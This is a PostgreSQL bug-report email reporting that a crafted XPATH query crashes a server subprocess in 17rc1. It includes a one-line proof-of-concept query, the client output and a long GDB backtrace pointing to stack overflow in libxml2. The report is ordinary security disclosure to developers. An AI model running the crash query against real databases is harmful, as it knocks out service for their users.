Postgres Pro
Downloads
Home   >   mailing lists

BUG #18617: PostgreSQL Server Subprocess Crashes by the XPATH Function Expression with Crafted Arguments - Mailing list pgsql-bugs

From PG Bug reporting form
Subject BUG #18617: PostgreSQL Server Subprocess Crashes by the XPATH Function Expression with Crafted Arguments
Date
Msg-id 18617-1cee4d2ed1f4e7ae@postgresql.org
Whole thread Raw
Responses Re: BUG #18617: PostgreSQL Server Subprocess Crashes by the XPATH Function Expression with Crafted Arguments
Re: BUG #18617: PostgreSQL Server Subprocess Crashes by the XPATH Function Expression with Crafted Arguments
List pgsql-bugs
Tree view 
The following bug has been logged on the website:

Bug reference:      18617
Logged by:          Jingzhou Fu
Email address:      fuboat@outlook.com
PostgreSQL version: 17rc1
Operating system:   Ubuntu 20.04 with docker image 'postgres:17rc1'
Description:

PostgreSQL server 17rc1 subprocess crashes by the XPATH function expression
with crafted arguments. The Main process is not affected.

PoC:
```
SELECT XPATH(REPEAT('(', 100000), '<root/>');
```

Client Output:
```
psql (17rc1 (Debian 17~rc1-1.pgdg120+1))
Type "help" for help.
postgres=# SELECT XPATH(REPEAT('(', 100000), '<root/>');
server closed the connection unexpectedly
        This probably means the server terminated abnormally
        before or while processing the request.
The connection to the server was lost. Attempting reset: Failed.
```

GDB Backtrace (It seems to be a stack overflow):
```
#0  0x00007a66b81a74b2 in ?? () from
target:/lib/x86_64-linux-gnu/libxml2.so.2
#1  0x00007a66b81a86d6 in ?? () from
target:/lib/x86_64-linux-gnu/libxml2.so.2
#2  0x00007a66b81a908d in ?? () from
target:/lib/x86_64-linux-gnu/libxml2.so.2
...
#120767 0x00007a66b81a908d in ?? () from
target:/lib/x86_64-linux-gnu/libxml2.so.2
#120768 0x00007a66b81af062 in xmlXPathCompile () from
target:/lib/x86_64-linux-gnu/libxml2.so.2
#120769 0x00005a0ebb12c131 in ?? ()
#120770 0x00005a0ebb12cd4e in xpath ()
#120771 0x00005a0ebae4c67a in ?? ()
#120772 0x00005a0ebae7f6b3 in ?? ()
#120773 0x00005a0ebae50145 in standard_ExecutorRun ()
#120774 0x00005a0ebae5f2fd in fmgr_sql ()
#120775 0x00005a0ebae4c67a in ?? ()
#120776 0x00005a0ebaf46efc in evaluate_expr ()
#120777 0x00005a0ebaf47140 in ?? ()
#120778 0x00005a0ebaf480fd in ?? ()
#120779 0x00005a0ebaebe58b in expression_tree_mutator_impl ()
#120780 0x00005a0ebaebe495 in expression_tree_mutator_impl ()
#120781 0x00005a0ebaf48fc7 in eval_const_expressions ()
#120782 0x00005a0ebaf2c953 in ?? ()
#120783 0x00005a0ebaf34b02 in subquery_planner ()
#120784 0x00005a0ebaf35459 in standard_planner ()
#120785 0x00005a0ebb001440 in pg_plan_query ()
#120786 0x00005a0ebb001532 in pg_plan_queries ()
#120787 0x00005a0ebb001806 in ?? ()
#120788 0x00005a0ebb0033ee in PostgresMain ()
#120789 0x00005a0ebaffde7f in BackendMain ()
#120790 0x00005a0ebaf6bf2a in postmaster_child_launch ()
#120791 0x00005a0ebaf6fa39 in ?? ()
#120792 0x00005a0ebaf71958 in PostmasterMain ()
#120793 0x00005a0ebac96476 in main ()
```

pgsql-bugs by date:

Previous
From: Vinay Oli
Date:
Subject: Re: Reg: Size difference
Next
From: Erik Wienhold
Date:
Subject: Re: BUG #18617: PostgreSQL Server Subprocess Crashes by the XPATH Function Expression with Crafted Arguments